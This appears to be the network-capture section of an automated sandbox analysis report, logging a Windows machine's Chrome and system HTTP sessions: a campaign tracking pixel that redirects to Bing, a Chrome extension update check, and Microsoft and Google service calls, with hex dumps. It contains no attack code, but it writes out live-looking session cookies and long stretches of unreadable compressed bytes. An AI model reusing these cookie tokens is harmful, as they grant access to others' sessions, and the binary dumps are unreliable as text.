                                                                                                                                                                                                                                                                        X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                                                                                                                                        X-Search-SafeSearch: Moderate
                                                                                                                                                                                                                                                                        X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                                                                                                                                                                                        X-UserAgeClass: Unknown
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                        Host: www.bing.com
                                                                                                                                                                                                                                                                        Content-Length: 2483
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1701869563912&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
                                                                                                                                                                                                                                                                        2023-12-06 13:33:15 UTC1OUTData Raw: 3c
                                                                                                                                                                                                                                                                        Data Ascii: <
                                                                                                                                                                                                                                                                        2023-12-06 13:33:15 UTC2482OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                                                                                                                                                                                                                        Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                                                                                                                                                                                                                        2023-12-06 13:33:16 UTC476INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 70 74 2d 43 48 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 62 69 6c 65 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a 58 2d 4d 53 45 64 67 65 2d 52 65 66 3a 20 52 65
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 204 No ContentAccess-Control-Allow-Origin: *Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionX-MSEdge-Ref: Re


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        6192.168.2.549724172.67.213.1534432972C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:19 UTC718OUTGET /pixel?pmhzmq=fhoohvpn6e7i&c=5306757&pl=0x03&pb=1&px=2598 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: axsboe-campaign.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2023-12-06 13:33:20 UTC670INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 32 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 31 36 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Wed, 06 Dec 2023 13:33:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/5.4.16Location: https://www.bing.comAccess-Control-Allow-Origin: *CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        2023-12-06 13:33:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        7192.168.2.549722172.253.115.844432972C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:19 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                                                                                                                                        Host: accounts.google.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                        Origin: https://www.google.com
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
                                                                                                                                                                                                                                                                        2023-12-06 13:33:19 UTC1OUTData Raw: 20
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        2023-12-06 13:33:20 UTC1627INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 50 72
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKContent-Type: application/json; charset=utf-8Access-Control-Allow-Origin: https://www.google.comAccess-Control-Allow-Credentials: trueX-Content-Type-Options: nosniffCache-Control: no-cache, no-store, max-age=0, must-revalidatePr
                                                                                                                                                                                                                                                                        2023-12-06 13:33:20 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                                                                                                                                        2023-12-06 13:33:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        8192.168.2.549721142.251.111.1004432972C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:19 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: clients2.google.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Goog-Update-Interactivity: fg
                                                                                                                                                                                                                                                                        X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                                                                                                                                                                                        X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2023-12-06 13:33:20 UTC732INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 73 63 72 69 70 74 2d 73 72 63 20 27 72 65 70 6f 72 74 2d 73 61 6d 70 6c 65 27 20 27 6e 6f 6e 63 65 2d 71 67 79 74 36 73 4d 31 30 36 42 67 45 58 59 38 41 77 55 31 71 77 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 73 74 72 69 63 74 2d 64 79 6e 61 6d 69 63 27 20 68 74 74 70 73 3a 20 68 74 74 70 3a 3b 6f 62 6a 65 63 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 72 65 70 6f 72 74 2d 75 72 69 20 68 74 74 70 73 3a 2f 2f 63 73 70 2e 77 69 74 68 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 73 70 2f 63 6c 69 65 6e 74 75 70 64 61 74 65 2d 61 75 73 2f 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKContent-Security-Policy: script-src 'report-sample' 'nonce-qgyt6sM106BgEXY8AwU1qw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1Cache-Control
                                                                                                                                                                                                                                                                        2023-12-06 13:33:20 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 31 38 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 30 30 30 30 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                                                                                                                                        Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6183" elapsed_seconds="20000"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                                                                                                                                        2023-12-06 13:33:20 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                                                                                                                                                                                                                        2023-12-06 13:33:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        9192.168.2.54981423.221.242.90443
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:26 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                                                                                        2023-12-06 13:33:26 UTC435INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 70 69 56 65 72 73 69 6f 6e 3a 20 44 69 73 74 72 69 62 75 74 65 20 31 2e 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 6e 66 69 67 2e 6a 73 6f 6e 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 55 54 46 2d 38 27 27 63 6f 6e 66 69 67 2e 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 45 54 61 67 3a 20 22 30 78 36 34 36 36 37 46 37 30 37 46 46 30 37 44 36 32 42 37 33 33 44 42 43 42 37 39 45 46 45 33 38 35 35 45 36 38 38 36 43 39 39 37 35 42 30 43 30 42 34 36 37 44 34 36 32 33 31 42 33 46 41 35 45 37 22 0d 0a 4c 61 73 74 2d 4d 6f 64 69
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKApiVersion: Distribute 1.1Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.jsonContent-Type: application/octet-streamETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"Last-Modi


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        10192.168.2.54984423.221.242.90443
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:26 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                        Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                                                                                        2023-12-06 13:33:27 UTC773INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 31 36 20 4d 61 79 20 32 30 31 37 20 32 32 3a 35 38 3a 30 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 30 78 36 34 36 36 37 46 37 30 37 46 46 30 37 44 36 32 42 37 33 33 44 42 43 42 37 39 45 46 45 33 38 35 35 45 36 38 38 36 43 39 39 37 35 42 30 43 30 42 34 36 37 44 34 36 32 33 31 42 33 46 41 35 45 37 22 0d 0a 41 70 69 56 65 72 73 69 6f 6e 3a 20 44 69 73 74 72 69 62 75 74 65 20 31 2e 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 6e 66 69 67 2e 6a 73 6f 6e 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 55 54 46 2d 38 27 27 63 6f 6e 66 69 67 2e 6a 73 6f 6e 0d 0a 58 2d 43
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKLast-Modified: Tue, 16 May 2017 22:58:00 GMTETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"ApiVersion: Distribute 1.1Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.jsonX-C
                                                                                                                                                                                                                                                                        2023-12-06 13:33:27 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        11192.168.2.54986713.107.246.404432972C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:27 UTC633OUTGET /shared/1.0/content/js/BssoInterrupt_Core_PukjvzWvVsvIJFh4xJhtXA2.js HTTP/1.1
                                                                                                                                                                                                                                                                        Host: aadcdn.msauth.net
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        Origin: https://login.microsoftonline.com
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://login.microsoftonline.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2023-12-06 13:33:28 UTC765INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 32 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 38 37 34 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 33 31 20 4f 63 74 20 32 30 32 33 20 32 31 3a 32 32 3a 34 37 20 47 4d 54 0d 0a 45 54 61 67 3a 20 30 78
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKDate: Wed, 06 Dec 2023 13:33:27 GMTContent-Type: application/x-javascriptContent-Length: 48749Connection: closeCache-Control: public, max-age=31536000Content-Encoding: gzipLast-Modified: Tue, 31 Oct 2023 21:22:47 GMTETag: 0x
                                                                                                                                                                                                                                                                        2023-12-06 13:33:28 UTC15619INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bc bd 7b 5f e3 38 d2 30 fa ff f3 29 82 77 0f 63 4f 4c c8 05 68 70 70 e7 4d 03 dd cd 0c b7 21 61 7a 66 69 96 9f 93 28 e0 ee c4 ce da 0e 34 03 79 3f fb a9 8b 64 cb 8e 43 f7 ec 73 7e 67 2e c1 96 4a b2 54 aa 2a 55 95 4a d2 e6 cf 6b ff 53 f9 b9 b2 f1 e3 ff 54 7a fd ee 65 bf 72 fe be d2 ff 78 7c 79 58 b9 80 b7 3f 2b 67 e7 fd e3 83 a3 1f af 07 3f 8a ff f7 ef fd b8 32 f6 27 a2 02 7f 07 5e 2c 46 95 30 a8 84 51 c5 0f 86 61 34 0b 23 2f 11 71 65 0a bf 91 ef 4d 2a e3 28 9c 56 92 7b 51 99 45 e1 17 31 4c e2 ca c4 8f 13 28 34 10 93 f0 b1 62 42 75 d1 a8 72 e1 45 c9 53 e5 f8 c2 aa 41 fd 02 6a f3 ef fc 00 4a 0f c3 d9 13 3c df 27 95 20 4c fc a1 a8 78 c1 88 6a 9b c0 4b 10 8b ca 3c 18 89 a8 f2 78 ef 0f ef 2b a7 fe 30 0a e3 70 9c 54 22 31 14 fe 03
                                                                                                                                                                                                                                                                        Data Ascii: {_80)wcOLhppM!azfi(4y?dCs~g.JT*UJkSTzerx|yX?+g?2'^,F0Qa4#/qeM*(V{QE1L(4bBurESAjJ<' LxjK<x+0pT"1
                                                                                                                                                                                                                                                                        2023-12-06 13:33:28 UTC16384INData Raw: 21 ab e7 03 d0 f9 c8 ad a5 91 e0 e2 50 20 c6 c3 b8 1c 50 c3 fc c2 01 5d 35 ed 7c 2e ac 15 5b d1 f6 94 dc 4e 61 f1 5c be a5 34 ba ec a7 24 1d a8 d6 7d 0e a5 78 0e ed 87 fc 89 f2 d9 69 d9 8b 05 df 1f 83 07 78 e1 b5 24 5c 0f 39 03 be c9 db 3b ca 30 06 53 71 08 2a 0a 08 65 fc 43 07 9d e3 83 e5 78 ae 87 4d 5a b4 57 56 17 bb 05 5d 43 b8 d7 37 e9 99 9e 35 79 7a a1 ba bd 28 2c 5e 42 45 17 b7 d1 41 b5 da 84 14 d8 43 fe 84 93 2c e8 3a 2a 2f 85 f2 e8 6e 2a 98 1a 68 c9 41 44 8a ed 07 c0 84 0f a8 c0 2d 8b 2e 79 9f 0e 5d b9 a4 30 ab c3 97 25 be bc 5c df d8 65 19 b2 ad 6a 28 12 39 14 a0 3c 63 ab f8 5c d3 ef 62 5d 74 10 bb e9 4d 43 f8 e2 30 f5 61 25 3f 20 04 f3 73 04 76 ad f6 f0 1a 7c f0 9d d3 f9 89 0f b6 58 a5 6e 6c b1 4e dd d8 b5 da 21 8b ca 34 c4 29 06 41 6a fb b5 79
                                                                                                                                                                                                                                                                        Data Ascii: !P P]5|.[Na\4$}xix$\9;0Sq*eCxMZWV]C75yz(,^BEAC,:*/n*hAD-.y]0%\ej(9<c\b]tMC0a%? sv|XnlN!4)Ajy
